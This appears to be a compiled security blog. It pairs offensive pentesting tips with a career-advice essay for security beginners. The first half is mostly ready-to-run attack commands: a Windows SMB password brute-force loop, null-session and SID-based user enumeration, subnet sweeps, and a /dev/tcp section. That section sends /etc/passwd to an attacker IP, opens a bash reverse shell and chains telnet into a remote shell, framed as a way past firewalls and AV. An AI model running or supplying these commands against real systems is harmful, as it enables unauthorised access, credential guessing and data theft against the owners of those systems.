Security Reliks has become part of the SecureGossip initiative! We will no longer be double posting. However, I will post an RSS when we get that implemented.

All of our posts will now be made over there, as well as an archive of older posts!

We Moved Here!

read it here on the new blog!

See the full version on the new blog!

UN/PW Guessing

for /f %i in (knownUsers.txt) do @(for /f %j in (passwordList.txt) do @echo %i:%j & @net use \\<ip> %j /u:%i 2> nul && echo %i:%j >> success.txt && net use \\<ip /del)

for /f %i in (knownUsers.txt)

do @(for /f %j in (passwordList.txt)

do @echo %i:%j

& @net use \\<ip> %j /u:%i

2> nul

&& echo %i:%j >> successfulLogins.txt

&& net use \\<ip /del)

This is a fantastic tool. Have fun!

Read the rest of the post on the new blog!

Step 1: Establish a Null Session

C:\> net use \\<target_ip> "" /u:""

It is important to note that although RestrictAnonymous is set to 2, that does not prevent null sessions. It simply prevents the enumeration of users via null sessions.

Step 2: Determine Target Machine’s name

There are many methods to get this. Here is one:

C:\> nbtstat -a <target_ip>

Step 3: Aquire SID

C:\> user2sid \\<target_ip> <machine_name>

This will return to us the machines SID (Security Identifier). The SID is a unique number for each user/system. It follows the following format:

S-[Revision-Level]-[Authority Level]-[Domain-or-Computer-number]-[RID]

Example (brackets added for clarity): S-[1]-[5-21]-[165875785-1005667432-441284377]-[1023]

The RID is the number which represents the user ID. We use this to get their usernames.

Step 4: Aquire Admin account name

500 is the admin account, which allows us to identify the true admin even if the account name has been renamed. With that being known, you can manually determine the admin using sid2user.

C:\> sid2user \\<target_ip> <SID_with_RID_set_to_500>

For example, the SID with the RID set to 500 would look like:

S-1-5-21-165875785-1005667432-441284377-500

Step 5: Aquire Other Users

C:\> for /L %u in (1000,1,1015) do @sid2user \\<target_ip> <SID_without_RID> %u

This loop will brute force usernames by retrieving the usernames associated with RIDs 1000-1015. You can change this according to your needs.

There you go! now you can go on to password cracking, etc!

Find the entire post on the new blog site!

DNS Reverse Lookup

for /L %i in (1,1,255) do @nslookup x.x.x.%i 2> nul | find "Name" && @echo x.x.x.%i

for /L %i in (1,1,255)

do @nslookup x.x.x.%i

2> nul

| find "Name"

&& @echo x.x.x.%i

Its pretty nice for enumeration. Have fun!

for \L %i in (1,1,255) do @ping -n 1 x.x.x.%i | find "Reply"

how it works

for \L %i

%i in (1,1,255)

do @ping -n 1 x.x.x.%i

| find "Reply"

The results will show you the lines of a ping command containing the IP of hosts on the subnet. I.E

Reply from 192.168.1.2: bytes=32 time<1ms TTL=128

Reply from 192.168.1.15: bytes=32 time<1ms TTL=128

Reply from 192.168.1.117: bytes=32 time<1ms TTL=128

Enjoy!

All of our posts will now be made over there, as well as an archive of older posts!

We Moved Here!

Step 1: Download the latest BASH source

use a browser to get it here.

or

cd /tmp
sudo wget ftp.gnu.org/gnu/bash/bash-4.1.tar.gz

NOTE: Backtrack uses an older version of bash. I am not sure if they do this for any specific reason. I compiled 4.1 and havn’t had any issues. Let me know if you know otherwise

Step 2: Extract the source code

tar zxvf bash-4.1.tar.gz
cd bash-4.1

Step 3: Configure and install

sudo su
./configure --enable-net-redirections
make && make install

Step 4: Replace old version of bash with the new version

mv /bin/bash /bin/bash-OLD
ln -s /usr/local/bin/bash /bin/bash

Step 5: Test!

check to see if your new installation works. Close your current terminal, and reopn it. Then issue the following command and check the results:

reliks@bt:/tmp$ bash --version
GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)

.....
reliks@bt:/tmp$ /bin/bash --version
GNU bash, version 4.1.0(1)-release (i686-pc-linux-gnu)

You can now test to see if your access to /dev/tcp works:

cat < /dev/tcp/time.nist.gov/13

There you go! You should get back the time according to NIST.

Let me know if you have any issues! thanks!

Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:

1. Scope prevents you from uploading any files onto the machine
2. A Firewall/AV prevents using something like netcat.

what do you do? Use /dev/tcp

What is /dev/tcp?

this is a system file that allows you to interact directly with the tcp protocol.

Fu

In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:

$ nc -l -p <port>

Transfer file:

This is pretty straight forward, just like you would image:

cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>

Back on your listener console, you would then see the contents of /etc/passwd displayed. You would then easily pipe that into a file for parsing or future reference.

Port Scanner

This piece or art comes from Pen Testing Ninjitsu. To create a port scanner using built in bash commands, this is what you are looking to do:

$port = 1; while [$port -lt 1024];do echo > /dev/tcp/<TARG_IP>/$port;→
 [$? == 0] && echo $port "is open" >> /tmp/ports.txt; port = 'expr →
$port + 1'; done;

Let me break this down for you:

• Create a variable called port, and set its value equal to 1

port = 1;

• Create a loop that continues to run as long as the variable ‘port’ is less than 1024

while [$port -lt 1024];

• For each iteration, send some packets to the target IP address, with the port number equal to the current value of  our ‘port’ variable

do echo > /dev/tcp/<TARG_IP>/$port;

• Check to see what the bash error value is as a result of that echo into /dev/tcp. Check to see if it is equal to zero, or in other words, check to see if there were no errors

[$? == 0]

• If it IS equal to zero, or in other words, there were no errors, append a string into /tmp/ports.txt stating that the last scanned port is open

&& echo $port "is open" >> /tmp/ports.txt;

• Now increment the value of ‘port’ by 1, and finish this iteration of the loop.

port = 'expr $port + 1'; done;

Pretty messy, but also fairly straight forward. You could then just read

Backdoor/Reverse Shell

This is pretty slick in my opinion. Replicates netcat almost exactly. Not as pretty as some things, but still nice:

/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1

This is also straight forward:

• Invoke an interactive bash shell

/bin/bash -i

• Pipe that shell to the attacker (who has a netcat listener running)

> /dev/tcp/<Attacker_IP>/<port>

• Take standard input, and connect it to standard output. Do the same with standard error (2>)

0<&1 2>&1

This can also be similarly done using telnet by doing the following (although you need two listeners):

telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>

Pretty elite. hope it helps!

Why getting started is difficult

There are a few reasons getting into the security field is difficult. I have narrowed it down into a couple of reasons:

1. The knowledge base grows faster than you can learn – What I mean by this is that new things are being developed/discovered ever few minutes. I remember getting started in security, I would spend time learning something out of a book, or off of a webpage, just to find out that it was now old news. I would try fervently to climb the ladder, starting at the basics working my way up. However, after trying desperately to climb as fast as I could I began to notice that the ladder was growing taller faster than I could climb! This can be disheartening.
2. the width is just as big as the depth – There are so many different aspects of security! Testing, Incident Handling, Infrastructure, Management, etc, etc. They all seem to be quite similar, but also quite different in the kinds of skill sets they require! I remember feeling like the deeper I tried to delve into one area, the more complex and slower the learning became; Therefore the more I was falling behind in the other areas! This was very frustrating.
3. the starting line is quite vague – The first article I was told to read was Aleph One’s Smashing the Stack For Fun and Profit. Because I was 15 years old with little lower-level language experience. O was completely overwhelmed. I would run into phrases and words I didnt understand. I would search to learn about those things. In the course of getting definitions of those terms, I found myself encountering more nonsensical data! Therefore my search began digging deeper and deeper, eventually becoming a hole that never led back to my starting point. This was overwhelming.

Disheartening, Frustrating, and Overwhelming…

So you see, getting started in the security field is difficult. I am sure many people have different experiences. I suppose getting started through formal education, or work experience helps.  I pretty much had nothing except the web, IRC, and some less-novice hacker than I who I could throw questions at. It was a miracle I didn’t just give up on it. I am going to share with you some tips/mindsets I developed from my experience, as well as some resources and wisdom I can share looking back on the situation.

(A  quick word from the Mentor)

In order to succeed, you just need to commit yourself. If you are committed, you are going to do amazing! Seriously, Security is quite technical, but amazingly simplistic. To explain what I mean, let me share with you a quote from the Hacker’s Manifesto (i know, i know, just bare with me):

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it’s because I screwed it up. Not because it doesn’t like me…
Or feels threatened by me…
Or thinks I’m a smart ass…

I like this quote because it takes the magic out of computers. It reminds me that a computer simply has a set of rules, and that understanding those rules enables you to manipulate the system. Therefore, when learning security, remember that you are really just learning rules. Don’t get caught up in the proscribed methods, but recognize why those methods produce the results they do. If you do this, you will find yourself asking the RIGHT questions, and finding the BEST answers. This is KEY.

…But

Now that we have that out of the way, I am going to address the three issues I listed above:

1. Knowledge base - This is simple. Don’t become disheartened. Just learn to plug yourself in. In the military, when doing combat maneuvers, you always provide security. Security elements will protect the primary element from becoming overran by any unexpected enemy reinforcements. Do this in your learning. Plug in to sources of the newest developments in the security field. This will ensure that you are learning the new stuff while you are catching up on the fundamentals. I recommend a few sources for this:
   • Mailing Lists: These are a great resource. Most security lists are very well moderated, and very active. I recommend most of the SecurityFocus lists, the Metasploit list , and maybe a few others. That should be enough for now.
   • Blogs: Blogs are a great resource. Some are better than others, but they are a great place to start. Check out my favorite security links located on the right panel of my blog. Some of my favorites are Darknet, and Mubix’s blog.
   • Podcasts: I Love my podcasts! I am always looking out for new ones! I strongly recommend PaulDotCom and SecurityNow. In addition you might like Hak5, and some others. I also recommend the SANS Internet Storm Center casts to be caught up to date on the latest and greatest security vulnerabilities.
   • News: These are critical. In my opinion the best site overall for security is Packetstorm. They offer learning texts, tool archives, and the latest news. I also watch the SANS ISC journals, and the SANS reading room.
   • Twitter - The security industry is extremely active on twitter. You should plug yourself in to them to get started. I think all but 2 of the people I follow on twitter are security based. Go ahead and use that as a good place to start.
2. Width vs Depth: When it really comes down to it, you will just need to find one (or two) areas you really enjoy. When I say “Enjoy”, i mean it. You may want to end up doing management, but to start out I would find what appeals to you the most. This will guarantee that you keep interested, and will feel accomplished as you learn things! One thing I quickly learned was the amount of spillover that occurs at the deepest parts of each security emphasis. Truly, infrastructure will eventually lead to testing/auditing,  as well as incident handling, and so on. Like I said, find something you like, build a good basis, and then don’t be afraid to dive deep into what you enjoy. You will eventually find that you learn about all aspects of security, and wont mind the areas you lack in. The Security community is such a shared pool of knowledge, that learning from each other is half the fun. On that note, here are some tips to assist with this process:
   • Find your emphasis: Ask people on the mailing lists, search through forums, look for job descriptions. What I did was figure out what I thought was cool (breaking stuff), figure out what it was called (“hacking”), and then research what professional positions existed (Penetration Testing).
   • Find a mentor: Its all about who you know. Find someone who can help you answer your questions. They dont need to know everything, they just need to help point you in the right direction. My first mentors were a group of guys in an IRC channel. freenode has a ton of free channels. I would recommend checking out the above podcasts and looking into their IRC channels for people to help.
   • Hands-On as soon as possible - Get your hands-on right away. Download BackTrack to get your hands on a lot of new tools, and start learning linux. Don’t worry about knowing ALL of it; just learn what you need, and as further needs arise figure out how to do it. A great resource to figure out how to do things is SecurityTube. This site will give you tutorials and presentations on almost anything you need to know, from programming to hacking, etc. There are also a lot of great resources for practicing security related activities. Some of these are:
     • Web Applications: WebGoat, Gruyere (formerly Jarlsberg), DVWA, and the Hacme apps.
     • WarGames: Hack This Site, Over The Wire, and others I can post later.
     • Insecure Distributions: DVL, Metasploitable, Thomas Wilhelms’ de-ICE, PwnOS, and Hackedemia.
   • Certifications – I have found certifications to be great learning opportunities, not to mention how they increase your professional marketability. There are so many certs out there, that you can find one for whatever you are interested in. For those looking to do government/military work, I would look at the DoD 8570 to see what certs would give you the most flexibility for jobs. Here are some that I suggest:
     • Security+ – Overall great certification. If you want a good place to start for just overall security knowledge, this is the one you want.
     • eCPPT – I havn’t done this course, but I have heard nothing but great reviews. It includes the courseware for life, making it an excellent resource after you get the certification.
     • CEH – This is a great starter for those interested in penetration testing, or incident handling. I would strongly recommend this.
     • CCNA – If you are going to be doing more infrastructure, you may want to look into Cisco stuff. I put the CCNA because its considered the entry level Cisco cert. You eventually might want the CCNA-Security and some of the other certs that qualify you for firewalls and ids configuration.
     • CHFI – This is a good Incident Handler certification. Pretty cheap. I think you have to take the CEH before you can take this one.
3. Starting Line: There is none. Thats okay. You need to learn to revel in the successes! Become a sponge and just absorb everything. When you read something you don’t understand, dont fret. Just remember it, let it serve as a placeholder, and learn about it when you can. Dont let this be overwhelming! Let it be FUN! Find opportunities to teach others and you will figure out more than you would have initially. There are a few things I would recommend you learn that will answer a large amount of your potential questions:
   • TCP/IP – Learn about TCP/IP packets, layers, and basic communications. Understand these and you will do well. I would take the time to read the RFCs for these specific protocols.
   • Basic Programming – Being able to read through code logic. not necessarily know how to program.
   • Linux/Windows commands – knowing your way around the command line of both these systems will help greatly.

Hopefully this has been a good start to helping those get involved. Feel free to ask any questions.

Enjoy!